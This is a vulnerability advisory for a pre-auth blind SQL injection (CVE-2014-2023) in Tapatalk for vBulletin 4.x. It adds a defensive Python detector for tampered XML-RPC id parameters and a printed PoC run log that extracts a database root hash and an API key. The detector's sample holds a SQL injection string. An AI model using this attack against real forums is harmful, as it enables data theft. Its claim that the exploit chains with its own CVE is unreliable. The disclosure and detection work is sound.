Preliminary VulnNote

CVE-2014-2023 - Tapatalk for vBulletin 4.x - multiple blind SQL injections (pre-auth)

Overview

date    : 10/12/2014
cvss    : 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) base
cwe     : 89

vendor  : Tapatalk Inc
product : Tapatalk for vBulletin 4.x
versions affected: <= 5.2.1 - latest (to date)
                   5.2.1 (verified)
                   4.9.0 (verified)

exploitability:
    * remotely exploitable
    * NO authentication required
    * NO user interaction required
    * NO special configuration required (default settings)

Abstract

Tapatalk for vBulletin 4.x does not properly sanitize the parameters of the
unsubscribe_topic and unsubscribe_forum xmlrpc calls, allowing unauthenticated
users to inject arbitrary SQL commands.

googledork: see PoC code

Details

vulnerable components:
    ./mobiquo/functions/unsubscribe_forum.php
    ./mobiquo/functions/unsubscribe_topic.php
The xmlrpc request is decoded and the decoded, attacker-provided values are
used directly in an SQL query without sanitization.
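
As an added defender-side example (not part of the PoC or of the Tapatalk code), the following Python inspects XML-RPC requests to the mobiquo endpoint, picks out the two methods named above and flags calls whose id parameter is not a plain integer. It assumes that these calls carry a single numeric forum/topic id as their first parameter; the sample requests are constructed for the example.

```python
"""Flag XML-RPC calls to the Tapatalk mobiquo endpoint whose id parameter
does not look like a plain integer (added example, constructed sample data)."""
import re
import xmlrpc.client

# Methods the vulnerability note names as passing decoded values straight into SQL.
SUSPECT_METHODS = {"unsubscribe_forum", "unsubscribe_topic"}
# Assumption: both calls take one numeric forum/topic id as their first parameter.
INT_RE = re.compile(r"^\d+$")


def inspect_request(path: str, body: str) -> dict:
    """Return a verdict for one request: method, id parameter and whether it is abnormal."""
    verdict = {"method": None, "param": None, "suspicious": False, "reason": ""}
    if not path.endswith("/mobiquo/mobiquo.php"):
        return verdict  # not the Tapatalk endpoint, nothing to check
    try:
        params, method = xmlrpc.client.loads(body)
    except Exception as exc:  # malformed XML-RPC to this endpoint is itself worth a look
        verdict.update(suspicious=True, reason=f"unparseable xmlrpc: {exc}")
        return verdict
    verdict["method"] = method
    if method not in SUSPECT_METHODS:
        return verdict
    if not params:
        verdict.update(suspicious=True, reason="missing id parameter")
        return verdict
    raw = params[0]
    if isinstance(raw, xmlrpc.client.Binary):  # Tapatalk clients often base64-wrap strings
        raw = raw.data.decode("utf-8", "replace")
    verdict["param"] = str(raw)
    if not INT_RE.match(str(raw)):
        verdict.update(suspicious=True, reason="non-integer id")
    return verdict


def scan(requests):
    """Run inspect_request over (path, body) pairs, e.g. reassembled from a proxy log."""
    return [inspect_request(path, body) for path, body in requests]


# Constructed sample requests: a normal unsubscribe, a tampered id, an unrelated
# method on the same endpoint, and a request to a different path.
SAMPLE_REQUESTS = [
    ("/forum/mobiquo/mobiquo.php", xmlrpc.client.dumps(("42",), methodname="unsubscribe_topic")),
    ("/forum/mobiquo/mobiquo.php", xmlrpc.client.dumps(("7 or 1=1",), methodname="unsubscribe_forum")),
    ("/forum/mobiquo/mobiquo.php", xmlrpc.client.dumps((), methodname="get_config")),
    ("/forum/index.php", "<not-xmlrpc>"),
]

if __name__ == "__main__":
    for verdict in scan(SAMPLE_REQUESTS):
        print(verdict)
```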

Proof of Concept (PoC)

see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023


1) prerequisites
     vBulletin 4.x with Tapatalk for vBulletin 4.x installed
2) run PoC
     edit PoC to match your TARGET (optionally set DEBUG=True)
     (optionally) edit your query to extract specific database values
     Note: PoC will try to detect tapatalk on that host
     run PoC
	
by default the PoC extracts:
* mysql root hash (in case the vBulletin db user has permissions to do so)
* vbulletin db record fields (apikey) - perfectly chains with CVE-2014-2023

only limited by the vBulletin db_user access permissions


run:
[ i] Taptalk detected ...  'http://TARGET/mobiquo/mobiquo.php' ...  v.5.2.1  :) - OK
[   ] TAPATALK for vBulletin 4.x - SQLi
[--] Target: http://TARGET/forum.php
[ +] Attack - sqli
[ *] guess mysql user/pass
[    ] trying to guess length ...
. 
[  *] LENGTH = 0
[    ] trying to guess value  ...
[  *] SUCCESS!: query: select -1 from mysql.user where user='root' and password =''

[ *] guess apikey
[    ] trying to guess length ...
. . . . . . . . . 
[  *] LENGTH = 8
[    ] trying to guess value  ...
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
[  +] HIT! - [4]..
. . . . . . 
[  +] HIT! - 4[F]..
. 
[  +] HIT! - 4F[A]..
. . . . . . . . . . . . . . . . . . . . . . 
[  +] HIT! - 4FA[V]..
. . . 
[  +] HIT! - 4FAV[c]..
. . . . . . . . . . . . . . . . . . 
[  +] HIT! - 4FAVc[R]..
. . . . 
[  +] HIT! - 4FAVcR[D]..
. . . 
[  +] HIT! - 4FAVcRD[c]..
[  *] SUCCESS!: query: select -1 from setting where varname='apikey' and value ='4FAVcRDc'
4FAVcRDc
-- done --

Timeline

2014-01-14: initial vendor contact, no response
2014-02-24: vendor contact, no response
2014-10-13: public disclosure
2014-10-14: vendor response - acknowledged, fix in progress
2014-10-17: waiting for fix to become publicly available
2014-10-24: poc release

Contact

tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023

(0x721427D8)